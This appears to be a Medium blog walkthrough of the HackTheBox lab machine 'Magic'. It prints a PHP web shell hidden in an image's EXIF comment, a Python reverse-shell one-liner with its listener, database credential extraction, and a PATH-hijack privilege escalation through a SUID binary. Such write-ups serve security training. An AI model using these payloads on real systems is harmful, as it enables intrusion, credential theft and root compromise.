Ahmed Samir

Aug 24, 2020

4 min read

HackTheBox — Magic

Summary

Magic is a medium machine rate with IP 10.10.10.185

Enumeration

Nmap

Web Browsing

Port 80

I found login page, So i think to use sql injection

It’s redirected me to upload.php page

I tried to upload php file, But i got error

I decided to inject the payload in png photo using exfitool

root@strike:~# exiftool -Comment='<?php system($_GET["cmd"]); ?>' test.php.png 
    1 image files updated
root@strike:~#

After upload i went to directory and tried to executed commands

And It’s work, After that i tried to get the reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",4142));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Got it

root@strike:~# nc -lvp 4142
listening on [any] 4142 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.55] from (UNKNOWN) [10.10.10.185] 47278
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/Magic/images/uploads$

Let’s enumerate using this user

ww-data@ubuntu:/var/www/Magic$ls
ls
1 db.php5  index.php  logout.php upload.php
assets images  login.php  magic.sql

Let’s take a look on db.php5

www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

Now we have new credentials to access, But i can’t switch to this user
I decided to dump all database

www-data@ubuntu:/tmp$ mysqldump Magic -u theseus -p
mysqldump Magic -u theseus -p
Enter password: iamkingtheseus

-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version       5.7.29-0ubuntu0.18.04.1
...
--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
...
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-08-18 10:22:14

I got password from database, Let’s switch to this user

www-data@ubuntu:/var/www/Magic$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:~$

Gain user flag!

Privilege Escalation

SUID Binaries

theseus@ubuntu:~$ find / -perm -u=s 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
.....
.....
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount

Take a look on /bin/sysinfo

theseus@ubuntu:~$ strings /bin/sysinfo
/lib64/ld-linux-x86-64.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
.....
.....
popen() failed!                                                                                                                                                                                                                            
====================Hardware Info====================                                                                                                                                                                                      
lshw -short                                                                                                                                                                                                                                
====================Disk Info====================                                                                                                                                                                                          
fdisk -l                                                                                                                                                                                                                                   
====================CPU Info====================                                                                                                                                                                                           
cat /proc/cpuinfo                                                                                                                                                                                                                          
====================MEM Usage=====================                                                                                                                                                                                         
free -h

Path Injection
I created an executable named lshw in /tmp and added /tmp to the PATH environment variable

theseus@ubuntu:/tmp$ cat lshw
/bin/bash 1>&0 2>&0
theseus@ubuntu:/tmp$ chmod +x lshw 
theseus@ubuntu:/tmp$ ls -al lshw 
-rwxrwxr-x 1 theseus theseus 20 Aug 18 16:32 lshw
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Run /bin/sysinfo

theseus@ubuntu:/tmp$ /bin/sysinfo
====================Hardware Info====================
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
info.c  root.txt
root@ubuntu:/root#

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

--

More from Ahmed Samir

CTFer | Computer Science Student

Love podcasts or audiobooks? Learn on the go with our new app.

Try Knowable

Recommended from Medium

Mecanica Cnc Aluminium Machinery

LYNX 4016: 3 Axis CNC Panel Machining Center

Andrea Alicino

Creating a Physics-Based Character Controller in Unity

qmsWrapper

Why is my QMS software better than yours?

Myk Eff

in

Sound and Design

Managing Splice Preset Downloads

Guilherme Nascimento

Teeny is a micro-route system that is really micro, supports PHP 5.3

Sovereign Degens

Sovereign Degens Milestone Rewards

Nebulas

in

Nebulasio

NAS Graph Live — Building Open Middleware on Emerging Public Chains Based on The Graph Protocol

Matthew Boyd

[Leet Code] Longest Continuous Increasing Subsequence

AboutHelpTermsPrivacy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student

More from Medium

Prathamesh Tamanekar

OhSINT — TryHackMe Walkthrough

WindowsXP default wallpaper
Jasmine Parks

TryHackMe: Pentesting Fundamentals a Walkthrough

Jovan Veljkovic

Wonderland

CY3ER-R4T

Shibboleth WriteUp - HackTheBox

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Knowable